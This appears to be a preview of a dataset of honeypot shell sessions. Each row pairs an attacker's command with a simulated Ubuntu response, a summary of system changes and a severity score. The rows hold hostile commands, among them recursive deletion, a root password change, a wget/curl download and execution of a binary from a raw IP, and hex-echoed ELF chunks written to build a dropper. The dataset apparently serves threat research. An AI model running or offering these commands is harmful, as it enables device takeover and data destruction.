session_id stringclasses 160
values | period stringclasses 1
value | turn_index int64 0 351 | command stringlengths 1 1.77k | response stringlengths 12 6.81k | system_change stringlengths 4 2.61k | severity_vi int64 0 4 | response_source stringclasses 1
value |
|---|---|---|---|---|---|---|---|
3a134355f484 | 2021_2022 | 1 | echo -e '\x67\x61\x79\x66\x67\x74' | root@ubuntu:~# echo -e '\x67\x61\x79\x66\x67\x74'
gayfgt
root@ubuntu:~# | No system changes occurred. | 0 | curated_ubuntu |
3a134355f484 | 2021_2022 | 2 | echo -e '\x67\x61\x79\x66\x67\x74' | root@ubuntu:~# echo -e '\x67\x61\x79\x66\x67\x74'
gayfgt
root@ubuntu:~# | No system changes occurred. | 0 | curated_ubuntu |
1e046222e217 | 2021_2022 | 0 | rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox0\nxoxox0" | passwd; wget http://212.192.241.125/pedalcheta/cutie.x86_64; curl -O http://212.192.241.125/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86.nday; rm -rf cutie.* | root@ubuntu:~# rm -rf *
root@ubuntu:~# cd /tmp
root@tmp:~# rm -rf *
root@tmp:~# pkill xmrig
root@tmp:~# echo -e "xoxox0\nxoxox0" | passwd
New password: Retype new password: passwd: password updated successfully
root@tmp:~# wget http://212.192.241.125/pedalcheta/cutie.x86_64
--2023-10-31 18:27:03-- http://212.192.241.1... |
- All files in the current directory and '/tmp' directory were removed.
- The process 'xmrig' was killed.
- The root user's password was changed to 'xoxox0'.
- A file named 'cutie.x86_64' was downloaded from the server with IP '212.192.241.125' using wget and curl.
- The downloaded file was given full permissions and ... | 4 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 0 | >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/tmp# |
- A new file named '.l' was created in the '/tmp' directory.
- The working directory was changed to '/tmp'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 1 | >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var# |
- A new file named '.l' was created in the '/var' directory.
- The working directory was changed to '/var'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 2 | >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev# |
- A new file named '.l' was created in the '/dev' directory.
- The working directory was changed to '/dev'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 3 | >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/mnt# |
- A new file named '.l' was created in the '/mnt' directory.
- The working directory was changed to '/mnt'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 4 | >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/mnt# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var/run# |
- A new file named '.l' was created in the '/var/run' directory.
- The working directory was changed to '/var/run'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 5 | >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var/run# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var/tmp# |
- A new file named '.l' was created in the '/var/tmp' directory.
- The working directory was changed to '/var/tmp'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 6 | >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var/tmp# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/# |
- A new file named '.l' was created in the root directory '/'.
- The working directory was changed to '/'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 7 | >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev/netslink# |
- A new file named '.l' was created in the '/dev/netslink' directory.
- The working directory was changed to '/dev/netslink'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 8 | >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev/netslink# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev/shm# |
- A new file named '.l' was created in the '/dev/shm' directory.
- The working directory was changed to '/dev/shm'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 9 | >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev/shm# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/bin# |
- A new file named '.l' was created in the '/bin' directory.
- The working directory was changed to '/bin'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 10 | >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/bin# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/etc# |
- A new file named '.l' was created in the '/etc' directory.
- The working directory was changed to '/etc'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 11 | >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/etc# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/boot# |
- A new file named '.l' was created in the '/boot' directory.
- The working directory was changed to '/boot'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 12 | >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/boot# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/usr# |
- A new file named '.l' was created in the '/usr' directory.
- The working directory was changed to '/usr'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 13 | >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/usr# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/sys# |
- A new file named '.l' was created in the '/sys' directory.
- The working directory was changed to '/sys'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 14 | rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient | root@ubuntu:/sys# rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient
root@ubuntu:/sys# |
- The files 'ddnsclient' and 'ntpclient' in the '/sys' directory were removed.
- The 'echo' command was copied to a new file named 'ddnsclient'.
- The 'ddnsclient' file was emptied.
- The 'ddnsclient' file was copied to a new file named 'ntpclient'.
- The 'ddnsclient' and 'ntpclient' files were given full permissions. | 4 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 15 | echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00\x00\x00\x9c\x04\x40\x00\x34\x00\x00\x00\xf0\x08\x00\x00\x07\x10\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x06\x00\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x68\x08\x00\x00\x68\x08\x00\x00\x05\x... | root@ubuntu:/sys# echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00\x00\x00\x9c\x04\x40\x00\x34\x00\x00\x00\xf0\x08\x00\x00\x07\x10\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x06\x00\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x68\x08\x00\x00\x68... |
- The 'ddnsclient' file in the '/sys' directory was overwritten with a new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 16 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\xa5\x30\xff\x00\xe7\x30\x00\x2c\x05\x00\x25\x28\xa7\x00\xff\x00\xc2\x30\x00\x26\x04\x00\x25\x28\xa4\x00\x00\x12\x02\x00\x25\x28\xa2\x00\x00\x26\x05\x00\x02\x1a\x05\x00\x00\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\xa5\x30\xff\x00\xe7\x30\x00\x2c\x05\x00\x25\x28\xa7\x00\xff\x00\xc2\x30\x00\x26\x04\x00\x25\x28\xa4\x00\x00\x12\x02\x00\x25\x28\xa2\x00\x00\x26\x05\x00\x02... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 17 | echo -ne '\xa1\x0f\x04\x24\x02\x00\x1c\x3c\x5c\x87\x9c\x27\x21\xe0\x99\x03\x54\x80\x99\x8f\x21\x28\x80\x00\x08\x00\x20\x03\xa6\x0f\x04\x24\x02\x00\x1c\x3c\x40\x87\x9c\x27\x21\xe0\x99\x03\x21\x10\xa0\x00\x54\x80\x99\x8f\x21\x38\xc0\x00\x21\x28\x80\x00\x21\x30\x40\x00\x08\x00\x20\x03\xa5\x0f\x04\x24\x02\x00\x1c\x3c\x18\x... | root@ubuntu:/sys# echo -ne '\xa1\x0f\x04\x24\x02\x00\x1c\x3c\x5c\x87\x9c\x27\x21\xe0\x99\x03\x54\x80\x99\x8f\x21\x28\x80\x00\x08\x00\x20\x03\xa6\x0f\x04\x24\x02\x00\x1c\x3c\x40\x87\x9c\x27\x21\xe0\x99\x03\x21\x10\xa0\x00\x54\x80\x99\x8f\x21\x38\xc0\x00\x21\x28\x80\x00\x21\x30\x40\x00\x08\x00\x20\x03\xa5\x0f\x04\x24\x02... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 18 | echo -ne '\x10\x00\xbc\x8f\x28\x00\xbf\x8f\x00\x00\x00\x00\x08\x00\xe0\x03\x30\x00\xbd\x27\x02\x00\x1c\x3c\xcc\x86\x9c\x27\x21\xe0\x99\x03\x21\x10\xa0\x00\x54\x80\x99\x8f\x21\x38\xc0\x00\x21\x28\x80\x00\x21\x30\x40\x00\x08\x00\x20\x03\xa4\x0f\x04\x24\x02\x00\x1c\x3c\xa4\x86\x9c\x27\x21\xe0\x99\x03\x21\x10\xa0\x00\x54\x... | root@ubuntu:/sys# echo -ne '\xa1\x0f\x04\x24\x02\x00\x1c\x3c\x5c\x87\x9c\x27\x21\xe0\x99\x03\x54\x80\x99\x8f\x21\x28\x80\x00\x08\x00\x20\x03\xa6\x0f\x04\x24\x02\x00\x1c\x3c\x40\x87\x9c\x27\x21\xe0\x99\x03\x21\x10\xa0\x00\x54\x80\x99\x8f\x21\x38\xc0\x00\x21\x28\x80\x00\x21\x30\x40\x00\x08\x00\x20\x03\xa5\x0f\x04\x24\x02... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 19 | echo -ne '\x18\x00\xa4\xaf\x1c\x00\xa5\xaf\x20\x00\xa6\xaf\x06\x10\x04\x24\x18\x00\xa6\x27\x09\xf8\x20\x03\x01\x00\x05\x24\x10\x00\xbc\x8f\x28\x00\xbf\x8f\x00\x00\x00\x00\x08\x00\xe0\x03\x30\x00\xbd\x27\x02\x00\x1c\x3c\x30\x86\x9c\x27\x21\xe0\x99\x03\x30\xff\xbd\x27\xcc\x00\xbf\xaf\xc8\x00\xb6\xaf\xc4\x00\xb5\xaf\xc0\x... | root@ubuntu:/sys# echo -ne '\x18\x00\xa4\xaf\x1c\x00\xa5\xaf\x20\x00\xa6\xaf\x06\x10\x04\x24\x18\x00\xa6\x27\x09\xf8\x20\x03\x01\x00\x05\x24\x10\x00\xbc\x8f\x28\x00\xbf\x8f\x00\x00\x00\x00\x08\x00\xe0\x03\x30\x00\xbd\x27\x02\x00\x1c\x3c\x30\x86\x9c\x27\x21\xe0\x99\x03\x30\xff\xbd\x27\xcc\x00\xbf\xaf\xc8\x00\xb6\xaf\xc4... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 20 | echo -ne '\xfc\xff\x40\x14\x01\x00\x63\x24\x02\x00\x02\x24\x44\x80\x99\x8f\x1c\x00\xa2\xa7\x00\x50\x02\x24\xf4\x00\x07\x24\xc2\x00\x04\x24\x1f\x00\x05\x24\x62\x00\x06\x24\x09\xf8\x20\x03\x1e\x00\xa2\xa7\x10\x00\xbc\x8f\x01\x03\x05\x24\x18\x80\x84\x8f\x5c\x80\x99\x8f\x38\x08\x84\x24\xff\x01\x06\x24\x09\xf8\x20\x03\x20\x... | root@ubuntu:/sys# echo -ne '\xfc\xff\x40\x14\x01\x00\x63\x24\x02\x00\x02\x24\x44\x80\x99\x8f\x1c\x00\xa2\xa7\x00\x50\x02\x24\xf4\x00\x07\x24\xc2\x00\x04\x24\x1f\x00\x05\x24\x62\x00\x06\x24\x09\xf8\x20\x03\x1e\x00\xa2\xa7\x10\x00\xbc\x8f\x01\x03\x05\x24\x18\x80\x84\x8f\x5c\x80\x99\x8f\x38\x08\x84\x24\xff\x01\x06\x24\x09... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 21 | echo -ne '\x07\x00\x82\x16\x00\x00\x00\x00\x4c\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x01\x00\x04\x24\x10\x00\xbc\x8f\x00\x00\x00\x00\x3c\x80\x99\x8f\x21\x20\x20\x02\x1c\x00\xa5\x27\x09\xf8\x20\x03\x10\x00\x06\x24\x10\x00\xbc\x8f\x07\x00\x41\x04\x00\x00\x00\x00\x4c\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x23\x... | root@ubuntu:/sys# echo -ne '\x07\x00\x82\x16\x00\x00\x00\x00\x4c\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x01\x00\x04\x24\x10\x00\xbc\x8f\x00\x00\x00\x00\x3c\x80\x99\x8f\x21\x20\x20\x02\x1c\x00\xa5\x27\x09\xf8\x20\x03\x10\x00\x06\x24\x10\x00\xbc\x8f\x07\x00\x41\x04\x00\x00\x00\x00\x4c\x80\x99\x8f\x00\x00\x00\x00\x09... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 22 | echo -ne '\x21\x98\x20\x03\x34\x80\x99\x8f\x21\x80\x00\x00\x21\x90\x20\x03\x18\x00\xb5\x27\x21\x20\x20\x02\x21\x28\xa0\x02\x21\xc8\x40\x02\x09\xf8\x20\x03\x01\x00\x06\x24\x01\x00\x03\x24\x10\x00\xbc\x8f\x05\x00\x43\x10\x04\x00\x04\x24\x21\xc8\x60\x02\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\x18\x00\xa3\x83\x00\x... | root@ubuntu:/sys# echo -ne '\x21\x98\x20\x03\x34\x80\x99\x8f\x21\x80\x00\x00\x21\x90\x20\x03\x18\x00\xb5\x27\x21\x20\x20\x02\x21\x28\xa0\x02\x21\xc8\x40\x02\x09\xf8\x20\x03\x01\x00\x06\x24\x01\x00\x03\x24\x10\x00\xbc\x8f\x05\x00\x43\x10\x04\x00\x04\x24\x21\xc8\x60\x02\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\x18... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 23 | echo -ne '\x80\x00\x06\x24\x21\x30\x40\x00\x10\x00\xbc\x8f\x21\x20\x80\x02\x07\x00\x40\x18\x21\x28\x60\x02\x21\xc8\x40\x02\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\xf2\xff\x00\x10\x21\x20\x20\x02\x50\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x21\x20\x20\x02\x10\x00\xbc\x8f\x00\x00\x00\x00\x50\x80\x99\x8f\x00\x... | root@ubuntu:/sys# echo -ne '\x80\x00\x06\x24\x21\x30\x40\x00\x10\x00\xbc\x8f\x21\x20\x80\x02\x07\x00\x40\x18\x21\x28\x60\x02\x21\xc8\x40\x02\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\xf2\xff\x00\x10\x21\x20\x20\x02\x50\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x21\x20\x20\x02\x10\x00\xbc\x8f\x00\x00\x00\x00\x50... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 24 | echo -ne '\xc0\x00\xb4\x8f\xbc\x00\xb3\x8f\xb8\x00\xb2\x8f\xb4\x00\xb1\x8f\xb0\x00\xb0\x8f\x08\x00\xe0\x03\xd0\x00\xbd\x27\x02\x00\x1c\x3c\xc4\x83\x9c\x27\x21\xe0\x99\x03\x21\x00\xe0\x03\x01\x00\x11\x04\x00\x00\x00\x00\x02\x00\x1c\x3c\xac\x83\x9c\x27\x21\xe0\x9f\x03\x21\xf8\x00\x00\x38\x80\x99\x8f\x00\x00\x00\x00\x08\x... | root@ubuntu:/sys# echo -ne '\xc0\x00\xb4\x8f\xbc\x00\xb3\x8f\xb8\x00\xb2\x8f\xb4\x00\xb1\x8f\xb0\x00\xb0\x8f\x08\x00\xe0\x03\xd0\x00\xbd\x27\x02\x00\x1c\x3c\xc4\x83\x9c\x27\x21\xe0\x99\x03\x21\x00\xe0\x03\x01\x00\x11\x04\x00\x00\x00\x00\x02\x00\x1c\x3c\xac\x83\x9c\x27\x21\xe0\x9f\x03\x21\xf8\x00\x00\x38\x80\x99\x8f\x00... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 25 | echo -ne '\x5c\x00\xa7\xaf\x50\x00\xa4\xaf\x54\x00\xa2\x27\x40\x00\xa2\xaf\x40\x00\xa3\x8f\x00\x00\x00\x00\x04\x00\x62\x24\x40\x00\xa2\xaf\x21\x10\x60\x00\x00\x00\x42\x8c\x00\x00\x00\x00\x3c\x00\xa2\xaf\x40\x00\xa3\x8f\x00\x00\x00\x00\x04\x00\x62\x24\x40\x00\xa2\xaf\x21\x10\x60\x00\x00\x00\x42\x8c\x00\x00\x00\x00\x38\x... | root@ubuntu:/sys# echo -ne '\x5c\x00\xa7\xaf\x50\x00\xa4\xaf\x54\x00\xa2\x27\x40\x00\xa2\xaf\x40\x00\xa3\x8f\x00\x00\x00\x00\x04\x00\x62\x24\x40\x00\xa2\xaf\x21\x10\x60\x00\x00\x00\x42\x8c\x00\x00\x00\x00\x3c\x00\xa2\xaf\x40\x00\xa3\x8f\x00\x00\x00\x00\x04\x00\x62\x24\x40\x00\xa2\xaf\x21\x10\x60\x00\x00\x00\x42\x8c\x00... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 26 | echo -ne '\x21\x10\x60\x00\x00\x00\x42\x8c\x00\x00\x00\x00\x30\x00\xa2\xaf\x40\x00\xa3\x8f\x00\x00\x00\x00\x04\x00\x62\x24\x40\x00\xa2\xaf\x21\x10\x60\x00\x00\x00\x42\x8c\x00\x00\x00\x00\x2c\x00\xa2\xaf\x40\x00\xa3\x8f\x00\x00\x00\x00\x04\x00\x62\x24\x40\x00\xa2\xaf\x21\x10\x60\x00\x00\x00\x42\x8c\x00\x00\x00\x00\x28\x... | root@ubuntu:/sys# echo -ne '\x21\x10\x60\x00\x00\x00\x42\x8c\x00\x00\x00\x00\x30\x00\xa2\xaf\x40\x00\xa3\x8f\x00\x00\x00\x00\x04\x00\x62\x24\x40\x00\xa2\xaf\x21\x10\x60\x00\x00\x00\x42\x8c\x00\x00\x00\x00\x2c\x00\xa2\xaf\x40\x00\xa3\x8f\x00\x00\x00\x00\x04\x00\x62\x24\x40\x00\xa2\xaf\x21\x10\x60\x00\x00\x00\x42\x8c\x00... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 27 | echo -ne '\x34\x00\xa7\x8f\x18\x80\x82\x8f\x00\x00\x00\x00\x44\x06\x59\x24\x09\xf8\x20\x03\x00\x00\x00\x00\x20\x00\xbc\x8f\x21\x20\x40\x00\x58\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x00\x00\x00\x00\x20\x00\xbc\x8f\x48\x00\xbf\x8f\x50\x00\xbd\x27\x08\x00\xe0\x03\x00\x00\x00\x00\x02\x00\x1c\x3c\x1c\x82\x9c\x27\x21\x... | root@ubuntu:/sys# echo -ne '\x34\x00\xa7\x8f\x18\x80\x82\x8f\x00\x00\x00\x00\x44\x06\x59\x24\x09\xf8\x20\x03\x00\x00\x00\x00\x20\x00\xbc\x8f\x21\x20\x40\x00\x58\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x00\x00\x00\x00\x20\x00\xbc\x8f\x48\x00\xbf\x8f\x50\x00\xbd\x27\x08\x00\xe0\x03\x00\x00\x00\x00\x02\x00\x1c\x3c\x1c... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 28 | echo -ne '\x14\x00\xa2\xaf\x58\x00\xa2\x8f\x00\x00\x00\x00\x18\x00\xa2\xaf\x40\x00\xa4\x8f\x44\x00\xa5\x8f\x48\x00\xa6\x8f\x4c\x00\xa7\x8f\x60\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x00\x00\x00\x00\x20\x00\xbc\x8f\x28\x00\xa2\xaf\x28\x00\xa2\x8f\x00\x00\x00\x00\x01\xf0\x42\x2c\x06\x00\x40\x14\x00\x00\x00\x00\x28\x... | root@ubuntu:/sys# echo -ne '\x14\x00\xa2\xaf\x58\x00\xa2\x8f\x00\x00\x00\x00\x18\x00\xa2\xaf\x40\x00\xa4\x8f\x44\x00\xa5\x8f\x48\x00\xa6\x8f\x4c\x00\xa7\x8f\x60\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x00\x00\x00\x00\x20\x00\xbc\x8f\x28\x00\xa2\xaf\x28\x00\xa2\x8f\x00\x00\x00\x00\x01\xf0\x42\x2c\x06\x00\x40\x14\x00... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 29 | echo -ne '\x21\x10\x80\x00\x21\x20\xa0\x00\x21\x28\xc0\x00\x21\x30\xe0\x00\x10\x00\xa7\x8f\x14\x00\xa8\x8f\x18\x00\xa9\x8f\x1c\x00\xaa\x8f\xe0\xff\xbd\x27\x10\x00\xa8\xaf\x14\x00\xa9\xaf\x18\x00\xaa\xaf\x1c\x00\xa2\xaf\x1c\x00\xa2\x8f\x0c\x00\x00\x00\x02\x00\xe0\x10\x20\x00\xbd\x27\x23\x10\x02\x00\x08\x00\xe0\x03\x00\x... | root@ubuntu:/sys# echo -ne '\x21\x10\x80\x00\x21\x20\xa0\x00\x21\x28\xc0\x00\x21\x30\xe0\x00\x10\x00\xa7\x8f\x14\x00\xa8\x8f\x18\x00\xa9\x8f\x1c\x00\xaa\x8f\xe0\xff\xbd\x27\x10\x00\xa8\xaf\x14\x00\xa9\xaf\x18\x00\xaa\xaf\x1c\x00\xa2\xaf\x1c\x00\xa2\x8f\x0c\x00\x00\x00\x02\x00\xe0\x10\x20\x00\xbd\x27\x23\x10\x02\x00\x08... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 30 | echo -ne '\x30\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\x21\x18\x40\x00\x28\x00\xa2\x8f\x00\x00\x00\x00\x23\x10\x02\x00\x00\x00\x62\xac\xff\xff\x02\x24\x18\x00\xa2\xaf\x04\x00\x00\x10\x00\x00\x00\x00\x28\x00\xa2\x8f\x00\x00\x00\x00\x18\x00\xa2\xaf\x18\x00\xa2\x8f\x20\x00\xbf\x8f\x28\x... | root@ubuntu:/sys# echo -ne '\x30\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\x21\x18\x40\x00\x28\x00\xa2\x8f\x00\x00\x00\x00\x23\x10\x02\x00\x00\x00\x62\xac\xff\xff\x02\x24\x18\x00\xa2\xaf\x04\x00\x00\x10\x00\x00\x00\x00\x28\x00\xa2\x8f\x00\x00\x00\x00\x18\x00\xa2\xaf\x18\x00\xa2\x8f\x20... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
